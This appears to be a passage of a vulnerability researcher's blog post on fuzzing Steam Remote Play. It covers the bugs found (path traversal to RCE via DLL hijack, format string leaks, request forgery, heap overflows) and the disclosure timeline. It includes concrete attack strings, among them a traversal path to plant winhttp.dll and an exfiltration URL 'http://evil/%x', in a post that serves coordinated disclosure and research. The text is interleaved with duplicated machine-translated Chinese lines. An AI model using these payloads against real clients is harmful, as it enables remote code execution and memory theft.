One of the challenges usually brought by fuzzing stateful network protocols is that of grammatical awareness. In our case, existing mutational engines inside fuzzing frameworks can definitely not be adopted out-of-the-box, as they would break the message’s structures. Even worse, they would totally disfigure all Protobuf serialized data, hence the need for a Protobuf-aware mutational engine.
The choice was made to write a custom Protobuf mutation engine from scratch for more flexibility, better integration and educational purposes. Other contenders for this component include libprotobuf-mutator, which was not invesitgated and could constitute a valid alternative, and ProtoFuzz, a Python library that ended up lacking flexibility for our use case, and in which there were too many bugs (such as broken support of repeated fields).
At its core, pbfuzz
relies on playing with inner objects and attributes of Google’s protobuf module, in order to walk through message descriptors, types, labels. Although the fuzzer is model-based and does not require input seeds (the Protobuf definitions are known in advance), several mutation strategies were implemented for each field type, taking inspiration from traditional model-less mutation engines.
Strings and bytes fields can undergo bit flips, byte substitutions, trimming, or insertion of random or “interesting” data like string formatters (%x
, %s
, %n
), paths, URLs, XML, JSON… of random length. These could trigger buffer overflows, format string vulnerabilities, logic bugs, or other kinds of more higher-level bugs.
Integer fields (and floats) are also mutated with interesting values, depending on bit size (32, 64) and signedness, opening up for integer overflows or out-of-bounds accesses.
Repeated fields (lists) can go through single mutations (only one element of the list is mutated), random trims or random insertions of random lengths. Nested message fields are mutated recursively as well.
Finally, fields marked as optional can also be deliberately omitted at random: indeed, a program could try accessing fields from a deserialized object without verifying whether they are actually present, leading to potentially unexpected behavior.
Fuzzing results and crash analysis
The fuzzing speed was limited by the target’s packet processing speed; in other words, the target acted as a bottleneck and the fuzzing speed had to be adjusted manually not to cause an overload. Still, the fuzzer was able to send 100 to 1000 messages per second without overworking the target too much.
In terms of surface, all the control messages were successfully reached, with a few exceptions being obsolete or unimplemented message types. Audio/video codecs were also all reached, except for the raw accelerated graphics format and the HEVC codec, which channels could not be opened for some reason.
The fuzzer could benefit from multiple improvements: for instance, it does not feature any dynamic instrumentation ability or code coverage, and it is not able to synchronize with the target either. But even though rpfuzz
is rather naive and black-box driven, it proved to be largely sufficient to uncover several bugs, as discussed in the next section.
pbfuzz
also comes with its own set of limitations. Namely: it only supports Protobuf 2, does not implement some concepts (like unions, maps or extensions that are practically non-existent in Remote Play), and could also feature better string mutators. However, it is rather efficient and malleable, and could be reused to fuzz other targets that feature Protobuf communications.
In order to monitor crashes, a simple way was to attach a debugger to the target in order to intercept crashes and analyze them. PageHeap was also enabled, which is a must-have to keep track of any out-of-bounds access in the heap.
Time Travel Debugging is also another nice tool to have in the toolbox to analyze certain crashes or bigger schemes that involve more convoluted control flows. More specifically, the ttddbg plugin for IDA is neat: it supports loading a TTD trace and debugging it.
时间旅行调试也是工具箱中另一个不错的工具,用于分析某些崩溃或涉及更复杂的控制流的更大方案。更具体地说,IDA 的 ttddbg 插件很简洁:它支持加载 TTD 跟踪并对其进行调试。
Vulnerabilities 漏洞
A couple dozen of bugs were identified thanks to rpfuzz
. They affect Remote Play in the Steam client, and also the Steam Link product. They should be replicable on other platforms (Linux, Android, iOS), although it was not verified for all of them.
由于 rpfuzz
.它们会影响 Steam 客户端中的远程游玩,也会影响 Steam 流式盒产品。它们应该可以在其他平台(Linux、Android、iOS)上复制,尽管尚未针对所有平台进行验证。
A lot of these bugs are unexploitable and/or uninteresting, therefore in this post we will go through a couple of the more technically interesting ones in more detail.
这些错误中有很多是不可利用的和/或无趣的,因此在这篇文章中,我们将更详细地介绍几个技术上更有趣的错误。
The vulnerabilities that were found all target the client implementation, although a few minor bugs were also found in the server implementation.
发现的漏洞都以客户端实现为目标,尽管在服务器实现中也发现了一些小错误。
Description 描述 | Impact 冲击 |
---|---|
CSetTouchIconDataMsg path traversal file writeCSetTouchIconDataMsg 路径遍历文件写入 |
Remote code execution 远程代码执行 |
CRemotePlayTogetherGroupUpdateMsg format string bugsCRemotePlayTogetherGroupUpdateMsg 格式字符串错误 |
Remote memory leak 远程内存泄漏 |
CRemotePlayTogetherGroupUpdateMsg request forgeryCRemotePlayTogetherGroupUpdateMsg 请求伪造 |
Info leak / pivot 信息泄漏/枢轴 |
CRemotePlayTogetherGroupUpdateMsg out-of-bounds accessCRemotePlayTogetherGroupUpdateMsg 越界访问 |
Type confusion 类型混淆 |
Video channel YV12 data heap overflow 视频通道 YV12 数据堆溢出 |
Remote (?) heap leak 远程 (?) 堆泄漏 |
CRemoteHIDMsg gamepad input report heap overflowCRemoteHIDMsg GamePad Input 报告堆溢出 |
Unknown 未知 |
Path traversal file write in CSetTouchIconDataMsg
路径遍历文件写入 CSetTouchIconDataMsg
This vulnerability is a perfect example of the “fuzzing is not only about crashes” rule: side effects of fuzzing on the system can also reveal bugs.
这个漏洞是“模糊测试不仅仅是崩溃”规则的一个完美例子:模糊测试对系统的副作用也可以揭示错误。
Here, we can see that weird-looking files with random (mutated) names and contents were created inside the client’s SteamLink
application data folder:
在这里,我们可以看到在客户端 SteamLink
的应用程序数据文件夹中创建了具有随机(突变)名称和内容的奇怪文件:
Fun fact: I only noticed these files by chance 5 months after their creation, which means this vulnerability could have been long fixed at the moment of my SSTIC talk…
有趣的事实:我只是在创建这些文件后 5 个月偶然注意到这些文件,这意味着这个漏洞在我发表 SSTIC 演讲的那一刻可能已经得到了很长时间的修复……
CSetTouchIconDataMsg
is a control message that allows the host of a Remote Play session to synchronize image files, such as controller binding icons originating from C:\Program Files (x86)\Steam\tenfoot\resource\images\library\controller\binding_icons
. The icons are then downloaded into %APPDATA%\Valve Corporation\SteamLink
.
CSetTouchIconDataMsg
是一条控制消息,允许 Remote Play 会话的主机同步图像文件,例如源自 C:\Program Files (x86)\Steam\tenfoot\resource\images\library\controller\binding_icons
的控制器绑定图标。然后将图标下载到 %APPDATA%\Valve Corporation\SteamLink
.
The protobuf definition for this message type is the following:
此消息类型的 protobuf 定义如下:
message CSetTouchIconDataMsg {
optional uint32 appid = 1;
optional string icon = 2;
optional bytes data = 3;
}
When the client receives an icon
field that starts with "@"
, it is first MD5-hashed:
if (icon_name[0] == '@') {
MD5_Init(&ctx);
MD5_Update(&ctx, &appid, 4);
MD5_Update(&ctx, icon_name, strlen(icon_name));
MD5_Final(&ctx, &path);
}
However, if the icon name does not start with "@"
, the client directly uses it as a relative path for a file write inside the SteamLink
application data folder. The host therefore fully controls the name of the file to write (icon
), but also the contents that are written to this file (data
).
An attacker can abuse this fact to write an arbitrary file on the victim’s file system by leveraging path traversal. Files can even be overwritten, and folders created recursively if they do not exist.
From there, many techniques can be applied to achieve remote code execution. I chose to illustrate the vulnerability with a basic DLL hijack.
Using Process Monitor, one can notice that the Steam client attempts to load winhttp.dll
, a DLL that is not found inside the Steam folder and thus fetched from System32.
By sending the icon string ../../../../../../Program Files (x86)/Steam/winhttp.dll
, we can create an arbitrary DLL inside the victim’s Steam folder. When the streaming client (or Steam) restarts, it will load the hijacked DLL: arbitrary code can then be executed.
Here is a video proof-of-concept:
The video shows both the attacker’s computer and the victim’s. The attacker invites the victim to a Remote Play session in the game Ultimate Tic-Tac-Toe. Note: here the victim is a friend, but this is not necessary; the attacker could have generated an invite link and sent it to anyone.
Once the session is established, the attacker silently delivers the payload by injecting a DLL into their own Steam process. Then, the victim is kicked out of the session. When they restart the Steam client, calc.exe
shows up instead.
Valve patched the vulnerability by ensuring all icon names are MD5-hashed, independently of the first character being a "@"
or not.
Format string bugs in CRemotePlayTogetherGroupUpdateMsg
Earlier, this message type was given as an example of a rather complex message type that could conceal many bugs. Well, this was done on purpose, because it is really full of bugs: the three next vulnerabilities we are going to cover all target this structure.
message CRemotePlayTogetherGroupUpdateMsg {
message Player {
optional uint32 accountid = 1;
optional uint32 guestid = 2;
optional bool keyboard_enabled = 3;
optional bool mouse_enabled = 4;
optional bool controller_enabled = 5;
repeated uint32 controller_slots = 6;
optional bytes avatar_hash = 7;
}
repeated .CRemotePlayTogetherGroupUpdateMsg.Player players = 1;
optional int32 player_index = 2;
optional string miniprofile_location = 3;
optional string game_name = 4;
optional string avatar_location = 5;
}
This message is basically sent by the session host to notify the guest of various things: who are the players in the current session, where are their avatars stored, etc.
这条消息基本上是由会话主持人发送的,用于通知访客各种事情:谁是当前会话中的玩家,他们的头像存储在哪里等。
There are two distinct format string vulnerabilities in the code that handles this message.
处理此消息的代码中存在两个不同的格式字符串漏洞。
In the CMiniProfileLoader::LoadProfiles
function, a loop iterates over the players
list.
在函数中 CMiniProfileLoader::LoadProfiles
,循环遍历 players
列表。
while (n_players--) {
Player = *Players++;
if (Player->accountid) {
CMiniProfileLoader::LoadAccountProfile(
this,
RemotePlayTogetherGroupUpdateMsg->miniprofile_location,
Player->accountid
);
}
else if (Player->guestid) {
binarytohex(Player->avatar_hash, avatar_hash_size, hash_hex, 41);
CUtlString::Format(
url,
RemotePlayTogetherGroupUpdateMsg->avatar_location,
hash_hex,
hash_hex
);
CMiniProfileLoader::LoadGuestProfile(this, url, Player->guestid);
free(url);
}
}
When an accountid
field is provided in the current player object in the list, the CMiniProfileLoader::LoadAccountProfile
method eventually calls:
当在列表中的当前播放器对象中提供 accountid
字段时,该 CMiniProfileLoader::LoadAccountProfile
方法最终会调用:
CUtlFmtString::CUtlFmtString(url, miniprofile_location, accountid);
The miniprofile_location
field is naively used as a string formatter, which is controlled by the attacker (host). They also control the first argument to the format string (accountid
).
该 miniprofile_location
字段被幼稚地用作字符串格式化程序,由攻击者(主机)控制。它们还控制格式字符串 ( ) 的第一个参数 accountid
。
Therefore, the host can leak arbitrary memory from the process, using formatters such as %x
and %s
(unfortunately, the %n
formatter is disabled by default, thus no write primitive).
因此,主机可以使用诸如 %x
和 %s
之类的格式化程序从进程中泄漏任意内存(不幸的是, %n
默认情况下格式化程序是禁用的,因此没有写入原语)。
The formatted string is then later used as a URL and a CURL request is performed.
然后,格式化的字符串稍后用作 URL,并执行 CURL 请求。
There are two ways the attacker can retrieve back the formatted string:
攻击者可以通过两种方式检索格式化的字符串:
- Exfiltrate over HTTP (e.g. set
miniprofile_location
tohttp://evil/%x
and log the request); - Read received debug strings over the Stats channel (0x2).
The second option is the easiest one to carry out since it happens automatically. Indeed, by setting the miniprofile_location
field to "Leak: %08x.%08x.%08x.%08x"
, the CURL request fails and a debug string that looks like the following is output:
DebugString: "Web request Leak: 13374242.11fe0ff0.11fe0fec.13374242 failed, CURL error code 3, HTTP error code 0"
We haven’t talked about the Stats channel much yet. It implements a few message types:
enum EStreamStatsMessage {
k_EStreamStatsFrameEvents = 1;
k_EStreamStatsDebugDump = 2;
k_EStreamStatsLogMessage = 3;
k_EStreamStatsLogUploadBegin = 4;
k_EStreamStatsLogUploadData = 5;
k_EStreamStatsLogUploadComplete = 6;
}
In this channel exists a type of message used to send over log messages: k_EStreamStatsLogMessage
, which protobuf definition is the following.
message CLogMsg {
optional int32 type = 1;
optional string message = 2;
}
The streaming client happens to always automatically send all the debug strings over to the host via this channel and message! They’re even in plaintext.
Thus, the attacker retrieves the leaks without effort.
The second format string vulnerability is highly similar to the first one. When guestid
is set, the following call is performed:
CUtlString::Format(
url,
RemotePlayTogetherGroupUpdateMsg->avatar_location,
hash_hex,
hash_hex
);
Again, avatar_location
is a host-controlled field and is used as a string formatter. Since the formatted string is also used as a URL inside a CURL request, the same exfiltration techniques as before apply.
In terms of impact, these vulnerabilities allow an attacker to reliably and fully break ASLR on the victim’s machine, which is very often the first step to a memory corruption exploit.
More particularly on Windows, breaking ASLR for various Steam-related DLLs (such as steamclient.dll
) or other Windows DLLs can greatly help to further compromise the system in any other attack targeting the Steam client.
An attacker could also practically leak anything in the process’ memory, including potentially sensitive data (environment variables, paths, tokens…).
Valve patched these vulnerabilities by denying URLs that contain the character '%'
.
Request forgery in CRemotePlayTogetherGroupUpdateMsg
This vulnerability is a direct follow-up to the previous one.
Since the miniprofile_location
field is a fully host-controlled URL, an attacker can make the client perform an arbitrary HTTP(S) GET request (sadly, other wrappers such as file://
are disabled by the CURL options set in the client).
At this point, the client expects the CURL response to be a valid JSON file, which will in turn be parsed. However, if the response is not a valid JSON string, the following debug string will be output and sent back to the attacker:
"Couldn't parse profile data: syntax error at line 1 near: <RESPONSE CONTENTS>"
An attacker can exfiltrate the response to any HTTP GET request performed client-side! As long as the output is not JSON, of course.
This gives a so-called SSRF primitive (server side request forgery), but here I would rather call it a CSRF because the vulnerability lies on the client’s side — although the acronym CSRF is usually “reserved” for the cross-site request forgery web vulnerability…
这给出了一个所谓的 SSRF 原语(服务器端请求伪造),但在这里我宁愿称它为 CSRF,因为该漏洞位于客户端——尽管首字母缩略词 CSRF 通常“保留”用于跨站点请求伪造 Web 漏洞……
With such a primitive, an attacker could leak potentially sensitive data hosted on local web pages or over an internal network. They could also scan the victim’s internal network for recon (IP ranges, port scan).
使用这种原语,攻击者可能会泄露托管在本地网页或内部网络上的潜在敏感数据。他们还可以扫描受害者的内部网络以进行侦察(IP 范围、端口扫描)。
If a vulnerable internal service is found, an attacker could even pivot by exploiting it through GET requests (e.g. SQL injection in GET parameter): the possibilities are endless.
如果发现易受攻击的内部服务,攻击者甚至可以通过 GET 请求(例如 GET 参数中的 .SQL 注入)利用它进行透视:可能性是无穷无尽的。
Just for fun, we can try going a little deeper. I said the client expects a JSON string from the response, but what kind? Since the attacker controls it, it could be an additional attack vector.
只是为了好玩,我们可以尝试更深入一点。我说客户端期望响应中的JSON字符串,但是哪种类型?由于攻击者控制了它,因此它可能是一个额外的攻击媒介。
It appears that the client expects a JSON like the following:
客户端似乎需要如下所示的 JSON:
{
"avatar_url": "http://site/toto.png",
"persona_name": "xyz"
}
The client will then download the avatar and put it in local storage (usually in %AppData%\Roaming\Valve Corporation\SteamLink
). For instance, toto.png
will be saved to avatars/to/toto.png
:
然后,客户端将下载头像并将其放入本地存储中(通常在 %AppData%\Roaming\Valve Corporation\SteamLink
)。例如, toto.png
将保存到 avatars/to/toto.png
:
CUtlFmtString::CUtlFmtString(v14, "%s/avatars/%.2s/%s", StoragePath, filename, filename);
Unfortunately, there is no way to inject a "/"
or "\"
to perform path traversal here. Best I could do is write a file to the parent folder: with a filename like ..toto.txt
, the saved file will be avatars/../..toto.txt
, so ..toto.txt
will end up in the local storage root folder. But since in this case the filename starts with ..
, we won’t be able to override any interesting configuration file.
遗憾的是,这里没有办法注入或 "/"
"\"
执行路径遍历。我能做的最好的事情就是将文件写入父文件夹:文件名为 ..toto.txt
,保存的文件将是 avatars/../..toto.txt
,因此 ..toto.txt
最终将位于本地存储根文件夹中。但是,由于在这种情况下文件名以 ..
开头,我们将无法覆盖任何有趣的配置文件。
One may also drop a malicious file inside the avatars folder, but there is no way to execute it. You could also create a folder using an NTFS alternate data stream like toto::$INDEX_ALLOCATION
(a lesser-known trick… but pointless).
也可以将恶意文件放入 avatars 文件夹中,但无法执行它。您还可以使用 NTFS 备用数据流创建一个文件夹,例如 toto::$INDEX_ALLOCATION
(一个鲜为人知的技巧……但毫无意义)。
Valve patched this vulnerability by introducing a whitelist domain filter.
Valve 通过引入白名单域过滤器来修补此漏洞。
OOB access in CRemotePlayTogetherGroupUpdateMsg
OOB 访问 CRemotePlayTogetherGroupUpdateMsg
This bug resides yet again in the CRemotePlayTogetherGroupUpdateMsg
message, but this time, in the player_index
field:
此错误再次驻留在 CRemotePlayTogetherGroupUpdateMsg
消息中,但这次驻留在 player_index
字段中:
message CRemotePlayTogetherGroupUpdateMsg {
message Player {
optional uint32 accountid = 1;
optional uint32 guestid = 2;
optional bool keyboard_enabled = 3;
optional bool mouse_enabled = 4;
optional bool controller_enabled = 5;
repeated uint32 controller_slots = 6;
optional bytes avatar_hash = 7;
}
repeated .CRemotePlayTogetherGroupUpdateMsg.Player players = 1;
optional int32 player_index = 2; // <---
optional string miniprofile_location = 3;
optional string game_name = 4;
optional string avatar_location = 5;
}
As you can see, player_index
is a signed 32-bit integer. It is used to notify the client of which index in the players
list corresponds to the host player in the session.
如您所见, player_index
是一个有符号的 32 位整数。它用于通知客户端列表中的哪个索引 players
对应于会话中的主机播放器。
In order to reproduce this bug, the host must send two messages:
- The
CRemotePlayTogetherGroupUpdateMsg
with a large enoughplayer_index
; - A certain
CSetStreamingClientConfig
message that will actually trigger the bug.
Indeed, sending a certain CSetStreamingClientConfig
message to the client (which I didn’t exactly characterize — I only replayed the same message that my fuzzer stumbled upon) causes the CRemotePlayTogetherDialog::Update
method to be called:
do {
Player = Players[k];
is_host = k == this->player_index;
if ( k == this->n_players - 1 && this->player_index > k ) {
is_host = 1;
Player = Players[this->player_index];
}
// ...
CRemotePlayTogetherDialog::UpdatePlayerState(
this,
/* ... */,
Player,
is_host
);
} while ( ++k < this->n_players );
There is basically a loop over a list of players. The Player
variable should be a valid pointer to a CRemotePlayTogetherGroupUpdateMsg_Player
structure that represents a player, especially when it is passed over to CRemotePlayTogetherDialog::UpdatePlayerState
.
It turns out that this->player_index
is the player_index
value from the latest seen CRemotePlayTogetherGroupUpdateMsg
message, which the attacker controls.
At the last loop iteration, since this->player_index > k
is a signed comparison, the attacker can only enter the highlighted branch if player_index
is a positive signed integer. But other than that, verifying the condition is trivial and leaves a lot of room to go out of bounds, relatively to the start of the players vector.
Even better: if through CRemotePlayTogetherGroupUpdateMsg
the attacker has never sent a list of players before, then Players
is NULL, and this fact is never checked. Since the client lives in a 32-bit process, the attacker can pretty much point to anywhere in memory.
This effectively leads to type confusion: we could fake a Player structure somewhere in memory (maybe with some heap spraying) and given an ASLR leak, fake the Player
object that is passed to the UpdatePlayerState
method.
If this latter function wrote to fields of the Player
structure, this would give an arbitrary write primitive.
Unfortunately, the UpdatePlayerState
method doesn’t do anything really interesting with the Player
structure: barely a few read accesses (that are in turn not used for any other write access).
不幸的是,该 UpdatePlayerState
方法并没有对 Player
结构做任何真正有趣的事情:几乎没有几个读取访问(反过来又不用于任何其他写入访问)。
Still, this bug highlights how some bugs can be stateful, and how fuzzing many message types at once can help uncover those.
尽管如此,这个 bug 还是强调了一些 bug 是如何有状态的,以及一次模糊许多消息类型如何帮助发现这些错误。
Heap overflow in YV12 video frames
YV12 视频帧中的堆溢出
We saw that in order to transmit audio and video data, several codecs and formats are available.
我们看到,为了传输音频和视频数据,可以使用多种编解码器和格式。
Before sending video data, the host must send a CStartVideoDataMsg
message and specify a video codec:
在发送视频数据之前,主播必须发送消息 CStartVideoDataMsg
并指定视频编解码器:
message CStartVideoDataMsg {
required uint32 channel = 1;
optional .EStreamVideoCodec codec = 2 [default = k_EStreamVideoCodecNone];
optional bytes codec_data = 3;
optional uint32 width = 4;
optional uint32 height = 5;
}
enum EStreamVideoCodec {
k_EStreamVideoCodecNone = 0;
k_EStreamVideoCodecRaw = 1;
k_EStreamVideoCodecVP8 = 2; // unimplemented?
k_EStreamVideoCodecVP9 = 3; // unimplemented?
k_EStreamVideoCodecH264 = 4;
k_EStreamVideoCodecHEVC = 5;
k_EStreamVideoCodecORBX1 = 6; // unimplemented?
k_EStreamVideoCodecORBX2 = 7; // unimplemented?
}
If the host chooses the raw codec, they can send video frames with raw pixel data over the newly opened channel. The structure for video frames becomes the following:
如果主机选择原始编解码器,则可以通过新打开的通道发送带有原始像素数据的视频帧。视频帧的结构如下所示:
Field 田 | Size (bytes) 大小(字节) |
---|---|
Packet type (k_EStreamDataPacket )数据包类型 ( k_EStreamDataPacket ) |
1 |
Video sequence number 视频序列号 | 2 |
Timestamp 时间戳 | 4 |
Unknown 未知 | 6 |
Length of protobuf data protobuf 数据的长度 | 1 |
Protobuf data (CVideoFormat ) messageProtobuf 数据 ( CVideoFormat ) 消息 |
variable 变量 |
Raw video data | variable |
First of all, the length field for the protobuf serialized data is not even checked, so the client may try to deserialize out-of-bounds heap data up to 256 bytes and crash, although this fact is unexploitable for an info leak.
The CVideoFormat
message specifies the data format of the frame, and its dimensions:
message CVideoFormat {
required .EVideoFormat format = 1 [default = k_EVideoFormatNone];
optional uint32 width = 2;
optional uint32 height = 3;
}
As shown in the codec and format tree diagram earlier, the raw codec implements two distinct encoding formats:
enum EVideoFormat {
k_EVideoFormatNone = 0;
k_EVideoFormatYV12 = 1;
k_EVideoFormatAccel = 2;
}
The vulnerability specifically lies in the YV12 format. When frames are rendered inside CStreamPlayer::BUpdateVideo
, here is what happens:
该漏洞具体存在于 YV12 格式中。当帧在里面 CStreamPlayer::BUpdateVideo
渲染时,会发生以下情况:
if ( VideoFormat == k_EVideoFormatYV12 ) {
// [...]
SDL_UpdateYUVTexture(texture, 0, Yplane, Ypitch, Uplane, Upitch, Vplane, Vpitch);
SDL_RenderCopy(renderer, texture, src_rect, dst_rect);
}
The Y, U, V planes passed to SDL_UpdateYUVTexture
are pointers to different sections inside the video data. These pointers depend on the host-provided frame dimensions.
传递给的 Y、U、V 平面 SDL_UpdateYUVTexture
是指向视频数据中不同部分的指针。这些指针取决于主机提供的帧尺寸。
YUV, or YCbCr, is a type of color space that uses one luminance component and two chrominance components. Initially designed for television, it is more efficient than RGB for visual perception.
YUV 或 YCbCr 是一种使用一个亮度分量和两个色度分量的色彩空间。它最初是为电视设计的,在视觉感知方面比RGB更有效。
However, no check is performed on the size of the video data sent by the host. Thus, an attacker can specify large frame dimensions, but send less video data than expected.
但是,不会检查主机发送的视频数据的大小。因此,攻击者可以指定较大的帧尺寸,但发送的视频数据比预期的要少。
A heap overflow occurs inside SDL_UpdateYUVTexture
, and a lot of heap memory is leaked. The whole texture is rendered anyways, and the client may see something like this:
I thought of a way to exfiltrate the leak, but it’s not the most convincing and requires an extra user interaction, hence why I may not go as far as calling the vulnerability a remote heap leak:
- Send a malicious
CStreamingClientConfig
message to the client that will enable the performance overlay. - Ask the client to press “F8”. As the performance overlay is enabled, this will silently upload a screenshot of the rendered SDL window to the host.
- Listen to the Stats channel (
CDebugDumpMsg
) to retrieve a PNG file containing the texture, and convert the RGB pixels to YUV to read the leaked heap data.
The second step can be done through various ways, such as direct social engineering, or sending fake video data that tricks the client player into pressing F8 as if it were a game mechanic… but nothing cannot be done without additional user interaction.
I also wondered whether the server had the ability to remap the victim’s keyboard in order to trick them into uploading a screenshot by pressing any other key, but couldn’t work it out.
Moreover, converting the leaked pixels back from RGB to YUV space is not trivial as the conversion is not lossless in practice, partly because of floating point calculation.
Similar, funny heap leaks were also found in the CSetIconMsg
and CSetCursorImageMsg
messages, which allow the host to send raw RGBA images to set as window icon and system cursor.
Again, both components suffer from out-of-bounds read accesses in the heap because the image data size is not properly checked. For instance, here is a leaky 128px * 128px cursor:
Heap overflow in CRemoteHIDMsg
gamepad logic
This bug was found by fuzzing the client while an X-Box controller was plugged in (XInput device).
First, the device should be opened through a CHIDMessageToRemote.DeviceOpen
message, by specifying a path like sdl://1
.
When the host asks for HID input reports, the following message is sent:
message DeviceStartInputReports {
optional uint32 device = 1;
optional uint32 length = 2;
}
Then, the report generator component (CHIDDeviceReportGenerator
) collects the reports and allocates a CUtlBuffer
object to store them, of attacker-controlled size (length
field), but which cannot exceed 27 bytes.
Eventually, the serializing logic (HIDDeviceSDLGamepadStateV2_t::Pack
) writes to this buffer. If the attacker provided length
field is too small, there is an out-of-bounds write in the heap.
最终,序列化逻辑 ( HIDDeviceSDLGamepadStateV2_t::Pack
) 写入此缓冲区。如果攻击者提供的 length
字段太小,则堆中存在越界写入。
The overflow is very small (a few bytes) and the attacker is not in control of the written contents, which originate from a controller-specific structure (joystick axis, button data…).
溢出非常小(几个字节),攻击者无法控制写入的内容,这些内容源自控制器特定的结构(操纵杆轴、按钮数据……
This renders the exploitation very hard, but perhaps not impossible; it was not explored further.
这使得开发非常困难,但也许并非不可能;没有进一步探讨。
Timeline 时间线
Date 日期 | |
---|---|
2022-10-12 | I submit a 1st report on HackerOne about the format string & request forgery vulnerabilities. 我在 HackerOne 上提交了关于格式字符串和请求伪造漏洞的第一份报告。 |
2022-10-18 | H1 analyst fails at reproducing the PoC; most likely because they did not adjust a certain function offset that varies between Steam versions (of course, the delay between the responses and the frequent Steam updates didn’t help the case). I respond in less than an hour and offer help to analyze their DLL to find the correct offset. H1 分析师无法重现 PoC;很可能是因为他们没有调整因 Steam 版本而异的特定功能偏移量(当然,响应和频繁的 Steam 更新之间的延迟对这种情况没有帮助)。我在不到一个小时的时间内做出回应,并提供帮助来分析他们的 DLL 以找到正确的偏移量。 |
2022-11-01 | H1 analyst declines my help and instead asks for detailed instructions as to how they can reverse engineer the DLL themselves to find the offset. H1 分析师拒绝了我的帮助,而是要求提供有关如何自行对 DLL 进行逆向工程以找到偏移量的详细说明。 |
2022-11-01 | Valve staff member changes the report status to Triaged. Valve 工作人员将报告状态更改为“正在分类”。 |
2022-11-05 | I provide detailed instructions on how to retrieve the function offset needed to make the PoC work on IDA with screenshots. Not sure if this ever helped since I have never heard back from the H1 analyst (obviously Valve would have no use of such instructions since they have Steam’s source code and PDB symbols). 我提供了有关如何检索使 PoC 在 IDA 上工作所需的函数偏移量的详细说明,并附有屏幕截图。不确定这是否有帮助,因为我从未收到 H1 分析师的回复(显然 Valve 不会使用此类指令,因为它们有 Steam 的源代码和 PDB 符号)。 |
2022-11-08 | Valve rewards me with a bounty and pushes a fix on the Steam Client Beta channel. Valve 奖励我赏金,并在 Steam 客户端测试频道上推送修复程序。 |
2022-11-09 | I take a look at the fix, and notice only the request forgery vulnerabilities have been seemingly patched: the format strings remained untouched. Since the fix is not necessarily trivial, I suggest a few ideas of potential workarounds. 我看了一下修复程序,注意到只有请求伪造漏洞似乎得到了修补:格式字符串保持不变。由于修复不一定是微不足道的,因此我建议一些潜在的解决方法。 |
2022-12-14 | I come back at them after a month without news. 一个月后,我没有消息就回来了。 |
2023-01-11 | I come back at them after two months without news. At this point I have also asked several times whether they are fine with me communicating on my findings once patches are live. 两个月没有消息后,我又回到了他们身边。在这一点上,我还多次询问过他们是否同意在补丁上线后就我的发现进行交流。 |
2023-01-17 | Valve rewards me with an additional bonus bounty and pushes a new, working fix on the Steam Client Beta channel. However, they still pay no attention to my questions regarding disclosure and I will never get an answer. Valve 奖励我额外的奖金赏金,并在 Steam 客户端测试频道上推送了一个新的有效修复程序。但是,他们仍然不注意我关于披露的问题,我永远不会得到答案。 |
2023-01-20 | I submit a 2nd report on HackerOne that gathers a few more minor vulnerabilities at once (including the heap overflows). 我在 HackerOne 上提交了第二份报告,该报告一次收集了更多小漏洞(包括堆溢出)。 |
2023-01-24 | H1 analyst asks for fully working PoCs for each single bug. I explain that I do not plan on providing those for several reasons (one of them being that developing standalone PoCs in these scenarios is highly time-consuming). I even let them know that I don’t mind not being rewarded a bounty, as long as the bugs get through Valve so that I can communicate on them at the SSTIC conference. H1 分析师要求为每个 bug 提供完全有效的 PoC。我解释说,出于几个原因,我不打算提供这些内容(其中之一是在这些场景中开发独立的 PoC 非常耗时)。我甚至告诉他们,我不介意不获得赏金,只要这些漏洞通过 Valve,这样我就可以在 SSTIC 会议上就它们进行交流。 |
2023-03-21 | I come back at them after two months without news, and try to pressure them as the SSTIC deadline is getting near. 在两个月没有消息后,我又回到了他们身边,并试图在SSTIC截止日期临近时向他们施压。 |
2023-04-11 | H1 analyst informs me that Valve “didn’t reach a final decision regarding the report” (?) and warns me that disclosure would go against H1’s policy (actually, their guidelines do state that, for transparency reasons, finders are encouraged to disclose their reports if the team is unresponsive for around 6 months). H1 分析师告诉我,Valve “没有就报告做出最终决定”(?),并警告我披露将违反 H1 的政策(实际上,他们的指导方针确实指出,出于透明度原因,如果团队在大约 6 个月内没有回应,鼓励发现者披露他们的报告)。 |
2023-06-08 | I present my work at the SSTIC conference. I receive a lot of positive feedback, which motivates me to come back on my work and spend a few days looking for an RCE (which I did not have yet at this point). 我在SSTIC会议上展示我的工作。我收到了很多积极的反馈,这促使我重新开始工作,并花了几天时间寻找RCE(当时我还没有)。 |
2023-06-13 | Valve staff member changes the 2nd report status to Triaged and rewards me with a bounty. Maybe they heard of my talk? Valve 工作人员将第 2 次报告状态更改为 Triaged 并奖励我。也许他们听说过我的演讲? |
2023-06-19 | I discover the file write RCE and submit a 3rd report on HackerOne with a fully working PoC and a video. 我发现文件编写了 RCE,并在 HackerOne 上提交了第 3 份报告,其中包含一个完全正常工作的 PoC 和一个视频。 |
2023-06-20 | Valve staff member changes the 3rd report status to Triaged and pushes a fix to the Steam Client Beta channel (in one day!). However, they lower the severity from Critical to High and reward me with a smaller bounty. I try to explain to them that the vulnerability is indeed Critical, as they seem to have misunderstood a certain component of the CVSS rating system. Valve 工作人员将第 3 次报告状态更改为“分类”,并将修复推送到 Steam 客户端测试频道(在一天内!但是,他们将严重性从“严重”降低到“高”,并奖励我较小的赏金。我试图向他们解释,该漏洞确实是严重的,因为他们似乎误解了 CVSS 评级系统的某个组成部分。 |
2023-07-18 | I come back at them after a month without news. Valve won’t reassess the severity to Critical (not sure why), but they do readjust the bounty correctly. 一个月后,我没有消息就回来了。Valve 不会将严重性重新评估为严重(不知道为什么),但他们确实正确地重新调整了赏金。 |
2023-07-25 | Valve silently closes the 2nd report; fixes are seemingly pushed to the Steam Client Beta channel. Valve 静默关闭第 2 个报告;修复程序似乎被推送到 Steam 客户端测试频道。 |
Conclusion 结论
In this blog post, we have covered several captivating aspects of vulnerability research:
在这篇博文中,我们介绍了漏洞研究的几个引人入胜的方面:
- choosing a target and delimiting an attack surface;
选择目标并划定攻击面; - reverse engineering a product to bring out its software architecture;
对产品进行逆向工程以展示其软件架构; - reverse engineering a protocol and constructing a partial specification;
对协议进行逆向工程并构建部分规范; - deducing a minimalist implementation to communicate with the client (or server);
推导一个极简的实现来与客户端(或服务器)进行通信; - building a fuzzer upon all this work;
在所有这些工作的基础上建立一个模糊器; - analyzing crashes, exploiting bugs and assessing risk.
分析崩溃、利用错误和评估风险。
On a more personal note, I find it very satisfying to start analyzing such a product from zero and being able to progressively disentangle so much hidden knowledge, up to a point where you become able to do all the things listed above.
